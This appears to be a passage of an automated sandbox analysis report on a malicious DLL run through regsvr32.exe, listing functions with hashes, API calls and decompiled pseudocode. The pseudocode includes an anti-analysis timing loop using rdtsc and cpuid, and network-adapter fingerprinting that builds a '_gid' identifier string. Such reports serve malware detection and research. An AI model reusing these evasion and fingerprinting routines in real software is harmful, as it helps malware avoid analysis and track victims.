                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                    • API String ID: 4275171209-1517691801
                                                                                                                                                                                                    • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                    • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                    • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                    • API String ID: 1174013218-1650116920
                                                                                                                                                                                                    • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                    • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 4275171209-2766056989
                                                                                                                                                                                                    • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                    • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 004610AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcessSleepUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 354099737-0
                                                                                                                                                                                                    • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction ID: d89cefbe47e75c605efbb6f0079a1bc08ae79106d6b421b35fda30a90ec4728b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEC08C70105690C2FF1D5730E8487282234A382309F04061AC30305AF0EF3F44C8C30F
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                    • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                    • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 0046260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00461E13), ref: 0046264B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoNativeSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1721193555-0
                                                                                                                                                                                                    • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction ID: f7505df165ca0c88a4bea8b45b7e825aff0a7df183447f51ab4e5144ea974bc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E09262728A41D2DF10EF20E8443993320FBC5708F8441268A4E02664FF2DCA5DC719
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00461000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                    • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction ID: c3066b6d6183c94523ceb9c6e34ae53bc4a150e32b7b0f06f289f8351ff0536c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5D0A7B2E1024083EB308710EA1679A2311F3D4315F844206C64A44964EF3DC158C609
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %
                                                                                                                                                                                                    • API String ID: 0-2567322570
                                                                                                                                                                                                    • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                    • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                    • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00461E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E00461E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                    0x00461e50
                                                                                                                                                                                                    0x00461e50
                                                                                                                                                                                                    0x00461e50
                                                                                                                                                                                                    0x00461e50
                                                                                                                                                                                                    0x00461e55
                                                                                                                                                                                                    0x00461e5a
                                                                                                                                                                                                    0x00461e5f
                                                                                                                                                                                                    0x00461e60
                                                                                                                                                                                                    0x00461e6b
                                                                                                                                                                                                    0x00461e6b
                                                                                                                                                                                                    0x00461e71
                                                                                                                                                                                                    0x00461e73
                                                                                                                                                                                                    0x00461e84
                                                                                                                                                                                                    0x00461e86
                                                                                                                                                                                                    0x00461e8a
                                                                                                                                                                                                    0x00461e8e
                                                                                                                                                                                                    0x00461e92
                                                                                                                                                                                                    0x00461e96
                                                                                                                                                                                                    0x00461e98
                                                                                                                                                                                                    0x00461e9f
                                                                                                                                                                                                    0x00461ea2
                                                                                                                                                                                                    0x00461ea5
                                                                                                                                                                                                    0x00461eab
                                                                                                                                                                                                    0x00461ead
                                                                                                                                                                                                    0x00461eb8
                                                                                                                                                                                                    0x00461eba
                                                                                                                                                                                                    0x00461ec1
                                                                                                                                                                                                    0x00461ec4
                                                                                                                                                                                                    0x00461ec7
                                                                                                                                                                                                    0x00461ec7
                                                                                                                                                                                                    0x00461ee9

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                    • Instruction ID: e9a9cd00dc2c79723797bc32427b0991e0d3177a011f4b8fcac31760fea994d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F01D8B2B14B908BDF248F36B600349B6A2F38D7C0F148535EB9C43B18DA3CD4958B04
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Analysis Process: regsvr32.exe PID: 3048 Parent PID: 2492 regsvr32.exeCOMMON

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 020927BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                    			E020927BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E02092990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x20970c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E02092990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                    0x020927bc
                                                                                                                                                                                                    0x020927bc
                                                                                                                                                                                                    0x020927bc
                                                                                                                                                                                                    0x020927bf
                                                                                                                                                                                                    0x020927c3
                                                                                                                                                                                                    0x020927c7
                                                                                                                                                                                                    0x020927cb
                                                                                                                                                                                                    0x020927d4
                                                                                                                                                                                                    0x020927d7
                                                                                                                                                                                                    0x020927e7
                                                                                                                                                                                                    0x020927ea
                                                                                                                                                                                                    0x020927fa
                                                                                                                                                                                                    0x02092800
                                                                                                                                                                                                    0x02092806
                                                                                                                                                                                                    0x0209285f
                                                                                                                                                                                                    0x0209285f
                                                                                                                                                                                                    0x02092876
                                                                                                                                                                                                    0x0209287b
                                                                                                                                                                                                    0x02092893
                                                                                                                                                                                                    0x02092893
                                                                                                                                                                                                    0x0209280f
                                                                                                                                                                                                    0x02092814
                                                                                                                                                                                                    0x0209281f
                                                                                                                                                                                                    0x0209282c
                                                                                                                                                                                                    0x0209282c
                                                                                                                                                                                                    0x0209282f
                                                                                                                                                                                                    0x02092835
                                                                                                                                                                                                    0x0209283b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x02092842
                                                                                                                                                                                                    0x02092845
                                                                                                                                                                                                    0x02092849
                                                                                                                                                                                                    0x02092894
                                                                                                                                                                                                    0x02092897
                                                                                                                                                                                                    0x0209289e
                                                                                                                                                                                                    0x020928a9
                                                                                                                                                                                                    0x020928b5
                                                                                                                                                                                                    0x020928b7
                                                                                                                                                                                                    0x020928ba
                                                                                                                                                                                                    0x020928c1
                                                                                                                                                                                                    0x020928c8
                                                                                                                                                                                                    0x020928cd
                                                                                                                                                                                                    0x020928d0
                                                                                                                                                                                                    0x020928d0
                                                                                                                                                                                                    0x020928b5
                                                                                                                                                                                                    0x020928d7
                                                                                                                                                                                                    0x020928da
                                                                                                                                                                                                    0x020928df
                                                                                                                                                                                                    0x020928e8
                                                                                                                                                                                                    0x020928ed
                                                                                                                                                                                                    0x020928f6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x020928fc
                                                                                                                                                                                                    0x0209284b
                                                                                                                                                                                                    0x02092854
                                                                                                                                                                                                    0x02092859
                                                                                                                                                                                                    0x02092859

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,02092CFE,?,?,00000003,020924A4), ref: 0209280F
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,02092CFE,?,?,00000003,020924A4), ref: 02092845
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersInfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177971545-0
                                                                                                                                                                                                    • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction ID: 08033dd42a9111836460565db6bd3abec0680d1c119b4740cf2fbacf3efed143
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04318476602740A9EF16DB51E44879A77A1FB89F94F484125CE0F07B56EF38C18AE340
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 02091678, Relevance: 3.1, APIs: 2, Instructions: 77memorynativeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(?,?,00000000,02092CB1,?,?,00000003,020924A4), ref: 020916CB
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,02092CB1,?,?,00000003,020924A4), ref: 02091709
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3114120137-0
                                                                                                                                                                                                    • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction ID: 2c8173aa8c1be8cc6d4cad0c536e293bbc0337cd02452c8439880483ec519251
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2218E76715B4283EF468B56A848369E2B2FB89BC5F484034EE4F47756EF3DC486A700
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 02091810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction ID: d6afad58def3869fbcadb301dd7987e7cdca2494630fa0ecdf5ee760bb327733
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9871BF32300B8287EF65CF66E8447A977A1FB88B98F448125DE4B53B65DF38C596DB00
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8F91370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2111281002.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111271093.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111291794.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111308631.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111312450.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                    • API String ID: 4275171209-1517691801
                                                                                                                                                                                                    • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                    • Instruction ID: d58402523aa45de61867f6b8ded07bb346793c2564f4517cd5f4910259ccd42d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F451E1B251D6C48AE3A18B24E89479BBFA0F386358F145158E6CD4BBA9C37DC514CF44
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8F911B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
